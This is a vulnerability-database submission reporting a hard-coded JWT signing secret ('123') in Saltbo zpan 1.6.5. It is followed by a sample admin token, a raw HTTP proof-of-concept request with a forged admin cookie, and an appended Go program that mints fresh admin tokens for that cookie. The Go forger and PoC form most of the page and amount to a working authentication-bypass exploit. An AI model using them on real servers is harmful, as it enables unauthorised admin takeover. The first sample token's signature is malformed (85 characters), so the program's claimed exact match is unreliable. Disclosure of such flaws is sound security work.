Submit #608447: Saltbo zpan 1.6.5 Hard-coded Credentials

Title: Saltbo zpan 1.6.5 Hard-coded Credentials
Description:

# Summary

A critical security vulnerability has been identified in Saltbo/zpan v1.6.5: the application signs its JWT (JSON Web Token) session tokens with the hard-coded secret key "123". Because the signing key is static and public, an attacker can forge valid authentication tokens, bypass authentication and authorization, and gain administrative access to any zpan instance running this version.

# Details

The vulnerability stems from the use of a static HMAC-SHA512 (HS512) secret key ("123") for JWT signing in the z-token authentication mechanism (the token is presented to the server in the `z-token` cookie).

**Algorithm:** HS512 (HMAC-SHA512)

**Hard-coded secret key:** 123

**Sample admin JWT token:**

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMTkxLCJpYXQiOjE3NTE1MzUzOTEsImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1MzkxLCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.lhYjZpv4PAZSeq2zaLJDSgXvV5Lef2sArafHA2PQnTCeeUDT0yvPkG3qv5axKLBj-AeeAjWz3Y57_rrTavP4g

The token's header decodes to `{"alg":"HS512","typ":"JWT"}` and its payload to `{"aud":"zplatUsers","exp":1752140191,"iat":1751535391,"iss":"zplat","nbf":1751535391,"sub":"1","roles":["admin"]}`: a token for user ID 1 carrying the admin role, issued 2025-07-03 and valid for seven days, until 2025-07-10. Anyone who knows the key can mint a token with the same claims and a future `exp`.

# POC

Send an authenticated request with the forged token in the `z-token` cookie; the request below reads a system option with the forged admin token. Note that the tokens embedded in this report expired on 2025-07-10, so reproducing against a live instance requires minting a fresh token with the same key and an `exp` in the future.

```
GET /api/system/options/core.email HTTP/1.1
Host: target-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: z-token=eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMDg5LCJpYXQiOjE3NTE1MzUyODksImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1Mjg5LCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.a_B2Kzq9ZIi3-kqz0VcIsqX39Abn_Je2TUl_gt67ZkpbKt31hwa-vvrS9H2LIw2n7TmJwtk59tmsVkk9wQiZxQ;
Connection: keep-alive
```
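The following is an added Go example; it is not part of the submission and not zpan's own code. It reimplements HS512 JWT signing and verification with only the Go standard library, lays out the claims in the same key order as the sample token's payload so that the header and payload segments are reproduced byte for byte, reports whether the sample token's signature verifies under the secret "123", and mints a fresh seven-day admin token for use in the `z-token` cookie. The names `SignHS512`, `VerifyHS512`, `Claims`, `SampleClaims` and `FreshAdminClaims` are this example's own, and the claim values come from decoding the sample token above.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha512"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
	"time"
)

// sampleAdminToken is the admin token quoted in the submission (copied, not constructed).
const sampleAdminToken = "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9." +
	"eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMTkxLCJpYXQiOjE3NTE1MzUzOTEsImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1MzkxLCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0." +
	"lhYjZpv4PAZSeq2zaLJDSgXvV5Lef2sArafHA2PQnTCeeUDT0yvPkG3qv5axKLBj-AeeAjWz3Y57_rrTavP4g"

// header is the JOSE header; the field order reproduces {"alg":"HS512","typ":"JWT"}.
type header struct {
	Alg string `json:"alg"`
	Typ string `json:"typ"`
}

// Claims keeps the key order of the sample payload so json.Marshal is byte-identical to it.
type Claims struct {
	Aud   string   `json:"aud"`
	Exp   int64    `json:"exp"`
	Iat   int64    `json:"iat"`
	Iss   string   `json:"iss"`
	Nbf   int64    `json:"nbf"`
	Sub   string   `json:"sub"`
	Roles []string `json:"roles"`
}

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// SignHS512 returns header.payload.signature, the signature being HMAC-SHA512 over "header.payload".
func SignHS512(c Claims, secret []byte) (string, error) {
	h, _ := json.Marshal(header{Alg: "HS512", Typ: "JWT"}) // fixed struct, cannot fail
	p, err := json.Marshal(c)
	if err != nil {
		return "", err
	}
	signingInput := b64(h) + "." + b64(p)
	mac := hmac.New(sha512.New, secret)
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64(mac.Sum(nil)), nil
}

// VerifyHS512 accepts only alg=HS512 (no "none" or RS-to-HS confusion), compares the
// MAC in constant time, and returns the claims only for a valid signature. Expiry is
// deliberately left to the caller so the expired sample token can still be inspected.
func VerifyHS512(token string, secret []byte) (Claims, bool) {
	var c Claims
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, false
	}
	rawHeader, errH := base64.RawURLEncoding.DecodeString(parts[0])
	rawPayload, errP := base64.RawURLEncoding.DecodeString(parts[1])
	sig, errS := base64.RawURLEncoding.DecodeString(parts[2])
	if errH != nil || errP != nil || errS != nil {
		return c, false
	}
	var h header
	if json.Unmarshal(rawHeader, &h) != nil || h.Alg != "HS512" {
		return c, false
	}
	mac := hmac.New(sha512.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) || json.Unmarshal(rawPayload, &c) != nil {
		return c, false
	}
	return c, true
}

// SampleClaims is the decoded payload of sampleAdminToken: user 1, role admin, 7-day lifetime.
func SampleClaims() Claims {
	return Claims{Aud: "zplatUsers", Exp: 1752140191, Iat: 1751535391,
		Iss: "zplat", Nbf: 1751535391, Sub: "1", Roles: []string{"admin"}}
}

// FreshAdminClaims keeps the sample's issuer/audience/subject/role but dates it from now.
func FreshAdminClaims(now time.Time) Claims {
	c := SampleClaims()
	c.Iat, c.Nbf = now.Unix(), now.Unix()
	c.Exp = now.Add(7 * 24 * time.Hour).Unix()
	return c
}

func main() {
	secret := []byte("123") // the hard-coded value reported in the submission
	replica, _ := SignHS512(SampleClaims(), secret)
	fmt.Println("replica == sample token:", replica == sampleAdminToken)
	_, ok := VerifyHS512(sampleAdminToken, secret)
	fmt.Println("sample token verifies under \"123\":", ok)
	fresh, _ := SignHS512(FreshAdminClaims(time.Now()), secret)
	fmt.Println("fresh admin z-token:", fresh)
}
```

Running it prints whether the re-signed claims reproduce the quoted token exactly and whether the quoted token verifies under "123"; both are true only if the submission's key is correct, which the reader can confirm for themselves. The last line is the value to place in the `z-token` cookie of the POC request.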
Source: https://github.com/saltbo/zpan/issues/219
User: jiashenghe (UID 39445)
Submission: 07/03/2025 12:07 (12 months ago)
Moderation: 07/11/2025 10:50 (8 days later)
Status: Accepted
VulDB entry: 316097 [saltbo zpan up to 1.6.5/1.7.0-beta2 JSON Web Token token.go NewToken hard-coded password]
Points: 20
